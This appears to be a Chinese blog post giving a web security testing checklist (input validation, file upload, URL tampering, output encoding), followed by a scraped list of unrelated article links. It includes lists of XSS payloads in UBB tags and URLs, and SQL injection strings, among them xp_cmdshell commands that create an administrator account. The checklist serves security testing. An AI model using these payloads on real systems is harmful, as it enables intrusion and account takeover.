zishuijing2
zishuijing2

web安全测试

建立整体的威胁模型,测试溢出漏洞、信息泄漏、错误处理、SQL注入、身份验证和授权错误.

1.     输入验证

客户端验证服务器端验证(禁用脚本调试,禁用Cookies)

1.输入很大的数(如4,294,967,269),输入很小的数(负数)

2.输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应

3.输入特殊字符,:~!@#$%^&*()_+<>:{}|

4.输入中英文空格,输入字符串中间含空格,输入首尾空格

5.输入特殊字符串NULL,null0x0d 0x0a

6.输入正常字符串    

7.输入与要求不同类型的字符,如: 要求输入数字则检查正值,负值,零值(正零,负零),小数,字母,空值; 要求输入字母则检查输入数字

8.输入htmljavascript代码

9.对于像回答数这样需检验数字正确性的测试点,不仅对比其与问题最终页的回答数,还要对回答进行添加删除等操作后查看变化

例如:

1.输入”gfhd,看是否出错;

2.输入,看是否出现文本框;

3.输入看是否出现提示。

 

关于上传:

1.上传文件是否有格式限制,是否可以上传exe文件;

2.上传文件是否有大小限制,上传太大的文件是否导致异常错误,上传0K的文件是否会导致异常错误,上传并不存在的文件是否会导致异常错误;

3.通过修改扩展名的方式是否可以绕过格式限制,是否可以通过压包方式绕过格式限制;

4.是否有上传空间的限制,是否可以超过空间所限制的大小,如将超过空间的大文件拆分上传是否会出现异常错误。

5.上传文件大小大于本地剩余空间大小,是否会出现异常错误。

6.关于上传是否成功的判断。上传过程中,中断。程序是否判断上传是否成功。

7.对于文件名中带有中文字符,特殊字符等的文件上传。

下载:

1.      避免输入:/../web.

2.      修改命名后缀。

3.    关于URL

4.    1.某些需登录后或特殊用户才能进入的页面,是否可以通过直接输入网址的方式进入;

5.    2.对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址是否出错,是否可以非法进入某些页面;

6.    3.搜索页面等url中含有关键字的,输入html代码或JavaScript看是否在页面中显示或执行。

7.    4.输入善意字符。

8.     

9.    UBB:

10. 

11.[url=http://www.****.com] 你的网站[/url]

12.1.试着用各种方式输入UBB代码,比如代码不完整,代码嵌套等等.

13.2.UBB代码中加入属性,如样式,事件等属性,看是否起作用

14.3.输入编辑器中不存在的UBB代码,看是否起作用

15. 

16.[url=javascript:alert('hello')]链接[/url]

17.[email=javascript:alert('hello')]EMail[/email]

18.[[email protected] STYLE="background-image: url(javascript:alert('XSS'))"][email protected][/email]

19. 

20.[img]http://www.13fun.cn/2007713015578593_03.jpg style="background-image:url(javascript:alert('alert(xss)'))"[/img]

21.[img]http://www.13fun.cn/photo/2007-7/2007713015578593_03.jpg "οnmοuseοver=alert('hello');"[/img]

22. 

23.[b STYLE="background-image: url(javascript:alert('XSS'))"]一首诗酸涩涩服务网[/b]

24.[i STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/i]

25. 

26.[u]一二三四五六七北京市[/u]

27.[font=微软雅黑" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/font]

28.[size=4" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/size]

29.[color=Red" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/color]

30.[align=center" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/align]

31.[float=left" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/float]

32.[font=微软雅黑 STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/font]

33.[size=4 STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/size]

34.[color=Red STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/color]

35.[align=center STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/align]

36.[list=1]

37.[*]一二三四五六七北京市[/list]

38.[indent]一二三四五六七北京市[/indent]

39.[float=left STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市[/float]

40.[media=ra,400,300,0]http://bbsforblog.ikaka.com/posttopic.aspx?forumid=109[/media]

41. 

42.2.     输出编码

43.常用的测试输入语句有:

44.

45.

46.

47.

48.1.jpg" οnmοuseοver="alert('xss')

49.">

50.http://xxx';alert('xss');var/ a='a

51.‘”>xss&<

52.a=”/” ; b=”;alert(/xss/);//”

53.“输出内容” border=0 alt=logo />

54.“’”

55.‘”’

56.“””

57.

58.“”“

59.“‘

60.title=””

61.对输出数据到输出数据的对比,看是否出现问题。

62. 

63. 

64.3.     防止SQL注入

65.Admin--

66.or ­­­--­­

67.‘  and  (   )   exec   insert   *   %   chr   mid  

68.and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49)  ;  %20AND%201=2

69.‘and 1=1    ;  ‘And  1=1   ;   ‘aNd   1=1   ;

70.and 1=2    ;   ‘and 1=2

71.and 2=2

72.and user>0

73.and (select count(*) from sysobjects)>0

74.and (select count(*) from msysobjects)>0

75.and (Select Count(*) from Admin)>=0

76.and (select top 1 len(username) from Admin)>0(username 已知字段)

77.;exec master..xp_cmdshell “net user name password /add”—

78.;exec master..xp_cmdshell “net localgroup name administrators /add”—

79.and 0<>(select count(*) from admin)

80.  简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户,可以用where name=nchar(29992)+nchar(25143)代替。

81.4.     跨站脚本攻击(XSS

82.对于 XSS,只需检查 HTML 输出并看看您输入的内容在什么地方。它在一个 HREF 标记中吗?是否在 IFRAME 标记中?它在 CLSID 标记中吗?在 IMG SRC 中吗?某些 Flash 内容的 PARAM NAME 是怎样的?

83.~!@#$%^&*()_+<>,./?;'"[]{}/-

84.%3Cinput /%3E

85.%3Cscript%3Ealert('XSS')%3C/script%3E

86.

87.

88.

89.

90.

91.

92.javascript:alert(/xss/)

93.javascript:alert(/xss/)

94.

95.

96.

97.=’>

98.1.jpg" οnmοuseοver="alert('xss')

99.">

100.              http://xxx';alert('xss');var/ a='a

101.              ’”>xss&<

102.              "οnmοuseοver=alert('hello');"

103.              &{alert('hello');}

104.                >"'>

105.                >%22%27>

106.              >"'>

107.                AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22

108.                %22%2Balert(%27XSS%27)%2B%22

109.               

110.               

111.               

112.                a?

113.             

你可能感兴趣的:(安全测试)

  • 2.5 项目讲解流程 王守谦26 项目资料数据库
    一、项目讲解1、自我介绍2、项目流程-===============================二、自我介绍(一)、学员自我介绍,讲解存在的问题比如:讲解年份、卡顿、重点学历、忘记(二)自我规则内容1、开场白:礼貌用语2、时间:自我介绍1-2分钟以内3、内容:姓名、籍贯、毕业院校、(拉进面试官距离)4、技能:功能测试、接口测试、自动化测试、app测试、性能测试、安全测试黑盒测试、白盒测试、灰盒
  • 2018-01-27-安全测试信息搜集 测试墨
    1.信息收集:1.1放羊式查询1.2GoogleHacking语法filetype:inurl:intext:intitle:site1.3在线专业搜索引擎shodan在线使用,火狐浏览器插件,和Maltego,metasploit的结合。http://drops.wooyun.org/tips/24691.4狙击式收集,漏洞扫描工具,探索web框架--web扫描器,常见的有wvs10,appsc
  • 软件安全测试报告模板_软件质量保证与测试(课后习题与答案)--仅供复习参考... weixin_39687359 软件安全测试报告模板
    第1章软件测试基础一、填空题1.软件从“出生”到“消亡”的过程称为软件生命周期2.早期的线性开发模型称为瀑布开发模型。3.引入风险分析的开发模型为_螺旋开发模型。4.ISO/IEC9126:1991标准提出的质量模型包括.功能性、可靠性、可使用性、效率、可维护性、可移植性_6大特性。5.按照缺陷的严重程度可以将缺陷划分为_严重、一般、次要、建议6.验证软件单元是否符合软件需求与设计的测试称为_单元
  • Java 安全资源 安全程序员
    OWASP英文单词:OpenWebApplicationSecurityProjectOWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。近几年,OWASP峰会以及各国OWASP年会
  • 安全测试工具安装指南:在统信UOS上部署Burp Suite 鹏大圣运维 linux统信UOS安全测试工具gitlinux操作系统国产化桌面
    原文链接:安全测试工具安装指南:在统信UOS上部署BurpSuite大家好!在网络安全领域,BurpSuite是一款不可或缺的工具,它提供了从初级映射和分析应用程序攻击面到查找和利用安全漏洞的一系列功能。今天,我将为大家介绍如何在统信UOS上安装BurpSuiteCommunityEdition(社区版),版本为2023.12.1.5。值得一提的是,社区版和专业版的安装方法基本一致。准备工作在开始
  • 自动驾驶前端 Little Xi javascript前端css
    {{item.navItem}}-->主页场景库仿真测试事故分析自动驾驶安全测试平台exportdefault{name:'NavMenu',data(){return{navList:[{name:'/index',navItem:'主页'},{name:'/library',navItem:'场景库'},{name:'/test',navItem:'仿真测试'},{name:'/acciden
  • 新窗口打开vue项目中的静态pdf文件,并做权限控制 包子脸呀 javascriptvue.jses6前端前端框架
    问题:公司系统做安全测试,其中一个问题是没有登录的情况下,直接访问“项目地址/operate.pdf”此地址,会展示pdf文件。描述:点击系统内的一个按钮会打开新窗口展示系统操作手册(operate.pdf)文件,以下为原本的代码,原来将pdf文件放在public文件夹下(“项目地址/operate.pdf”就是访问的public文件夹下的pdf文件)解决:删除public文件夹下的pdf文件,将
  • AcuAutomate:一款基于Acunetix的大规模自动化渗透测试与漏洞扫描工具 FreeBuf_ 自动化elasticsearch运维
    关于AcuAutomateAcuAutomate是一款基于Acunetix的大规模自动化渗透测试与漏洞扫描工具,该工具旨在辅助研究人员执行大规模的渗透测试任务。在大规模的安全测试活动中,AcuAutomate可以帮助我们同时启动或停止多个Acunetix扫描任务。除此之外,我们还可以将其功能无缝集成到枚举封装器或One-Liner中,并通过管道功能实现更高效的控制。工具安装由于该工具基于Pytho
  • html5 指纹识别,Http指纹识别技术 Samuel Solomon html5指纹识别
    Http指纹识别技术Http指纹识别现在已经成为应用程序安全中一个新兴的话题,Http服务器和Http应用程序安全也已经成为网络安全中的重要一部分.从网络管理的立场来看,保持对各种web服务器的监视和追踪使得Http指纹识别变的唾手可得,Http指纹识别可以使得信息系统和安全策略变的自动化,在基于已经设置了审核策略的特殊的平台或是特殊的web服务器上,安全测试工具可以使用Http指纹识别来减少测试
  • Web安全测试之XSS 中科恒信
    XSS全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。才能有效的防止XSS的发生。阅读目录XSS是如何发生的HTMLE
  • 【网络安全】信息收集系列|子域名收集姿势总结 IT老涵 网络安全安全渗透测试信息安全运维
    声明:本文初衷为分享网络安全知识,请勿利用技术做出任何危害网络安全的行为,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责概述在渗透测试或SRC漏洞挖掘中,安全测试人员通常会得到一些域名资产。为了更好地进行渗透测试,通常都需要进行子域名收集。为什么需要进行子域名收集?扩大资产范围,可以增加漏洞发现的概率众所周知,一般情况下主站的安全性可能相对较高,而一些不常用
  • 天翼1号2021修改IMEI教程 ZERO-A-ONE Linux使用笔记linux
    Author:ZERO-A-ONEDate:2022-10-03本教程仅供安全测试,若将改串用于非法用途后果请自行承担天翼1号2021搭载了虎贲T710和春藤V510基带,是一部目前咸鱼只需要300左右的热点机首先我们需要在一台Windows7计算机上安装如下的两个驱动https://share.weiyun.com/zs8V3QWV然后我们知道360OS通用工程密码*20121220#在进入工程
  • 金三银四,你还不知道软件测试刷题APP的天花板就晚了! 测试界的飘柔 IT软件测试职场经验程序员测试工具自动化测试软件测试面试找工作职场经验
    想年后找工作或者等金三银四跳槽涨薪的朋友们有福了,今天给大家推荐一个软件测试面试的刷题小程序。相信有很多朋友找工作都倒在面试这一关上面,那是你还不知道有这么一个软件测试面试的刷题小程序。里面包含了面试常问的软件测试基础题,web自动化测试、app自动化测试、接口测试、性能测试、自动化测试、安全测试及一些常问到的人力资源题目。最主要的是他还收集了像阿里、华为这样的大厂面试真题,还有互动交流板块……刷
  • 嵌入式系统的安全测试和评估方法 科联学妹 网络安全
    安全测试是一个至关重要的过程,旨在评估系统的漏洞和弱点,识别潜在的安全风险。它旨在模拟真实的攻击场景,评估系统抵御和恢复安全威胁的能力。通过进行安全测试,开发人员可以在恶意实体利用之前发现和修复漏洞。这个过程对于保护敏感数据、保护用户隐私和确保嵌入式系统的整体完整性至关重要。嵌入式系统经常部署在医疗设备或交通系统等关键基础设施中,任何安全漏洞都可能产生严重后果。因此,对嵌入式系统进行安全测试具有以
  • 一文2000字记录基于jmeter+perfmon的稳定性测试 shanmao001 压力测试jmeterpython自动化测试测试工程师
    最近承接了项目中一些性能测试的任务,因此决定记录一下,将测试的过程和一些心得收录下来。说起来性能测试算是软件测试行业内,有些特殊的部分。这部分的测试活动,与传统的测试任务差别是比较大的,也比较依赖工具,一定程度上性能测试被认为是测试中的“高阶”部分,跟自动化测试、安全测试等并称。整理了一些软件测试方面的资料、面试资料(接口自动化、web自动化、app自动化、性能安全、测试开发等),有需要的小伙伴可
  • 【Java万花筒】数据的安全钥匙:Java的加密与保护方法 friklogff Java万花筒安全java网络开发语言
    编码的盾牌:Java开发人员的安全性武器库前言在当今数字化时代,保护用户数据和信息的安全已成为开发人员的首要任务。无论是在Web应用程序开发还是安全测试中,加密和安全性都是至关重要的。本文将介绍六个Java库和工具,它们为开发人员提供了实现加密和安全性的强大功能。欢迎订阅专栏:Java万花筒文章目录编码的盾牌:Java开发人员的安全性武器库前言1.OWASPJavaEncoder1.1概述1.2库
  • 代码安全审计经验集(下) INSBUG 安全
    对HTTP加密请求参数的测试对于HTTP请求体加密,如果直接使用明文的请求参数,是无法进行正常的安全测试的。但通常还是有办法分析出加解密的策略,如果能把加解密算法还原,就可以先将安全测试的payload添加到原始明文参数,再加密发送到服务端处理(可以编写对应的burp插件实现半自动化,因为逻辑漏洞还是要人工分析),好处就是可以绕过WAF这类防护设备,WAF可能具备解码BASE64编码的能力,但对这
  • “互联网营销师”将是未来热门职业 爆量学院
    人社部、市场监管总局、统计局2020年7月6日印发《关于发布区块链工程技术人员等职业信息的通知》,具体来看,新职业包括区块链工程技术人员、城市管理网格员、互联网营销师、信息安全测试员、区块链应用操作员、在线学习服务师、社群健康助理员、老年人能力评估师、增材制造设备操作员等。其中,互联网营销师是指在数字化信息平台上,运用网络的交互性与传播公信力,对企业产品进行营销推广的人员。主要工作任务包括:1.研
  • 软件测试的分类 软件测试很重要 软件测试
    软件测试的分类可以基于不同的标准,包括测试方法、测试方向、开发阶段、测试对象、测试状态、测试实施组织等。具体来说:按测试方法分类:这包括黑盒测试、白盒测试和灰盒测试。黑盒测试关注于软件的功能而不考虑内部逻辑;白盒测试则侧重于内部结构和代码逻辑;灰盒测试介于两者之间,结合了两者的某些方面。按测试方向分类:这涉及到功能测试、性能测试、安全测试等。功能测试检查软件是否按照规格说明执行预定功能;性能测试评
  • 嵌入式系统的安全测试与评估 CC学妹 经验分享
    嵌入式系统的安全测试与评估是一个重要的环节,它涉及到多个方面以确保系统的安全性。以下是一些主要的测试与评估方法:容错性评估:包括控制容错性评估、数据容错性评估、硬件故障恢复容错性评估。控制容错性度量主要考察对并发处理的控制能力和错误的可修正性和处理可继续进行能力;硬件故障中恢复容错性度量主要考察故障后恢复能力容错。易恢复性度量:与易恢复性紧密相关的测试是强度测试和健壮测试。通过易恢复性测试,一方面
  • 在资料甚少的情况下如何做安全加固? sophiasofia 安全加固安全
    前几年,公司要我们做一个安全红线项目,整个公司当时没人做过安全相关项目。现在聊聊我当时是如何在没有做过安全测试的情况下,在网上资料甚少的情况下通过了国际安全标准。一、前期调研1、调研各种扫描工具,到官网联系他们,了解后进行产品比较。安全加固少不了各种安全扫描工具和病毒扫描工具,扫描范围包括web扫描、系统服务器扫描、数据库扫描、端口扫描、病毒扫描、代码安全扫描、中间件扫描等。下面介绍一些国际比较认
  • 软件安全测试报告如何编写?权威的安全测试报告如何获取? 卓码测评 安全软件测试
    软件安全测试报告是一份详尽的文件,它主要通过对软件进行全面、系统的测试,评估软件的安全性,并在测试结束后起草编写的报告。该报告能清晰地展示出软件的各项安全风险以及潜在威胁,为用户提供安全方面的决策依据,并帮助开发者修复漏洞和加强系统的安全性。软件安全测试报告的编写需要有专业的测试人员以及专业的测试工具。测试人员需要进行全面的安全测试,包括对软件的入侵测试、漏洞扫描、身份验证、数据加密等方面的测试。
  • 小迪笔记基础入门1-3 来者是我 服务器网络运维
    基础入门-概念名词域名1域名是地址的名称2域名需要在第三方平台注册域名注册商:阿里云、万网等3一级域名:baidu.com二级域名:news.baidu.com三/多级域名:shehui.news.baidu.com4域名与安全测试:如果一级域名不能突破,可以从其他域名下手(多级域名的收集意义就是一个网站找不到漏洞是,可以找跟他它服务器相同的另一个多级域名上的漏洞,做旁路攻击。)DNS1域名系统(
  • 88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统 山兔1 小迪安全web安全
    目录1.开源系统、闭源系统、售卖系统2.如何寻找上述三类系统并进行安全测试3.如何挑简单的入手最快速度获取证书装x演示案例:某开源逻辑审计配合引擎实现通用某闭源审计或黑盒配合引擎实现通用某售卖审计或黑盒配合引擎实现通用涉及资源:要挖cnvd是有一个条件的,那就是通用性要100+,就可以达到证书的级别,不然的话,没有什么作用1.开源系统、闭源系统、售卖系统通用性100+:表示挖到的漏洞影响影响范围(
  • 主动网络安全:成本效率和危机管理的战略方法 网络研究院 网络研究院网络安全观点战略零信任
    如何面对复杂网络攻击的进攻策略以及零信任模型的作用。攻击后反应性网络安全策略的基本步骤,透明度和准备工作。讨论采用主动网络安全方法的好处,特别是在成本效率和危机管理方面,进攻性安全测试对合规性和零日响应的影响。组织应该更多地关注进攻性还是防御性网络安全策略?答案是肯定的。在理想的世界中,强大的进攻策略将消除大量行动防御的需要,但大多数组织无法足够快地或以有意义的方式进行必要的投资并部署新工具和流程
  • 软件测试行业从入行的功能测试到安全测试和测试管理的学习晋升路线与方法 秀才v_it1457
    说实话,软件测试行业是一个入行门槛低,但是后期发展上限很高的行业,也就是说只要你有本科学历(以前专科就行)有一定的技术基础就可以入行,哪怕你python语言都不懂,你也可以从做开始的功能测试做起,但是你要能够一直做下去,那么python语言,自动化测试的水平是一定要有的,最起码的接口自动化要会,那么如果你想进击大厂的话,那么java语言,java自动化的水平是一定要具备的,做到以上水平,一个月一万
  • 被忽视的暗面:客户端应用漏洞挖掘之旅 wei_java144 编程技术安全网络web安全
    被忽视的暗面:客户端应用漏洞挖掘之旅前言在2023年12月15日,我有幸参加了由“字节跳动安全中心”举办的“安全范儿”沙龙活动。作为“中孚信息元亨实验室”的一员,我被邀请分享名为“被忽视的暗面:客户端应用漏洞挖掘之旅”的技术议题。现整理成文字版分享出来,由于我不是专门从事二进制工作,因此文章中存在笔误或解释不对的地方,请各位师傅多多包涵!客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领
  • 接口安全测试 测试界媛姐 技术分享软件测试自动化测试软件测试
    一、后台接口分类1、接口类别:restful(json)soap(xml)2、协议:httphttps(ssl)3、restful接口请求类型get操作是安全的post的操作是不安全的同putdelete也是不安全的4、现状和问题大部分APP的接口都采用restful架构,restful最重要的一个设计原则就是客户端与服务端的交互在请求之间是无状态的。大部分都采用token的认证方式。token分
  • [20][04][10] Fortify Static Code Analyzer 详解 安全新司机 信息安全fortify信息安全
    文章目录1.FortifyStaticCodeAnalyzer是什么2.工具介绍3.代码安全扫描实施步骤3.1清理3.2构建3.3扫描1.FortifyStaticCodeAnalyzer是什么是MicroFocus的一款代码安全扫描工具,属于SAST(静态应用安全测试)阶段,支持27种开发语言的代码安全扫描,可以通过IDE和CI/CD在本地无缝启动扫描FortifyStaticCodeAnaly
  • Fortify Static Code Analyzer 23.2 for macOS, Linux & Windows - 静态应用安全测试 sysin.org HTTPmacoslinuxwindowssca
    FortifyStaticCodeAnalyzer23.2formacOS,Linux&Windows-静态应用安全测试FortifySCA-代码漏洞扫描工具|静态代码测试|代码安全分析请访问原文链接:https://sysin.org/blog/fortify-static-code-analyzer/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgFortifyStatic
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class